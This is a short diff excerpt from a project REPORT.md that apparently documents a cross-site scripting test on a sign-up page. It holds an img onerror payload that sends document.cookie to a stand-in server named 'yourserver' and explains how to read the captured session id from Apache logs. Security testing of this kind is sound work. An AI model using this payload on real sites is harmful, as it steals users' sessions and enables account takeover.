j0ly/FirstProject/REPORT.md

    ```<img src=x onerror=this.src='http://yourserver/?c='+document.cookie>```

-2. Log in to the Admin pages and take a look at the sign-ups.
+2. Go to the Admin pages and take a look at the sign-ups.
 The session-id should now be written to the Apache logs of “yourserver” (cat /var/log/apache2/access.log).

 But you can also test with code like this, in any of the fields on the SignUp page;